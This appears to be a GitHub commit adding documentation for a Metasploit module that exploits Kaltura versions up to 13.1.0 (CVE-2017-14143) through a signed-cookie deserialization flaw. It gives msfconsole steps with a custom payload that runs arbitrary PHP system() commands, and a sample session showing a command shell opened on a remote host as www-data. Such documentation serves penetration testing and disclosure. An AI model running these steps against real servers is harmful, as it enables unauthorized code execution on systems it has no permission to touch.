Skip to content

Commit 44e69f1

Browse files
committed
Documentation for Kaltura <= 13.1.0 RCE (CVE-2017-14143)
1 parent ddbff6b commit 44e69f1

File tree

1 file changed

+46
-0
lines changed

1 file changed

+46
-0
lines changed
Lines changed: 46 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,46 @@
1+
## Description
2+
3+
The getUserzoneCookie function in Kaltura before 13.2.0 uses a hardcoded cookie secret to validate cookie signatures, which allows remote attackers to bypass an intended protection mechanism and consequently conduct PHP object injection attacks and execute arbitrary PHP code via a crafted userzone cookie.
4+
5+
6+
## Vulnerable Application
7+
8+
This module exploits a remote code execution within the Kaltura(<=13.1.0) via a cookie deserialization.
9+
Vulnerability reference- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14143.
10+
11+
12+
## Verification Steps
13+
14+
1. Start msfconsole
15+
2. use exploit/linux/http/kaltura_unserialize_cookie_rce
16+
3. set RHOST https://example.com (or IP address)
17+
4. set ENTRYID 0_xxxxxxxx
18+
5. set payload generic/custom
19+
6. set payloadstr "system('command you want to execute, eg.- ls -la');"
20+
7. run
21+
22+
23+
## Options
24+
25+
default RPORT 4444
26+
27+
28+
## Scenarios
29+
30+
```
31+
msf use exploits/linux/http/kaltura_unserialize_cookie_rce
32+
msf exploit(kalkutra_unseialize_cookie_rce) set RHOST 46.101.209.202
33+
RHOST => 46.101.209.202
34+
msf exploit(kalkutra_unseialize_cookie_rce) set LHOST 192.168.1.16
35+
LHOST => 192.168.1.16
36+
msf exploit(kalkutra_unseialize_cookie_rce)>check
37+
[+] 46.101.209.202:4444 The target is vulnerable.
38+
msf exploit(kalkutra_unseialize_cookie_rce)>run
39+
[*] Started bind handler
40+
[*] Output:
41+
[*] Command shell session 1 opened (192.168.1.16:36865 -> 46.101.209.202:4444) at 2017-09-04 12:09:03 +0200
42+
43+
id
44+
uid=33(www-data) gid=33(www-data) groups=33(www-data)
45+
```
46+

0 commit comments

Comments
 (0)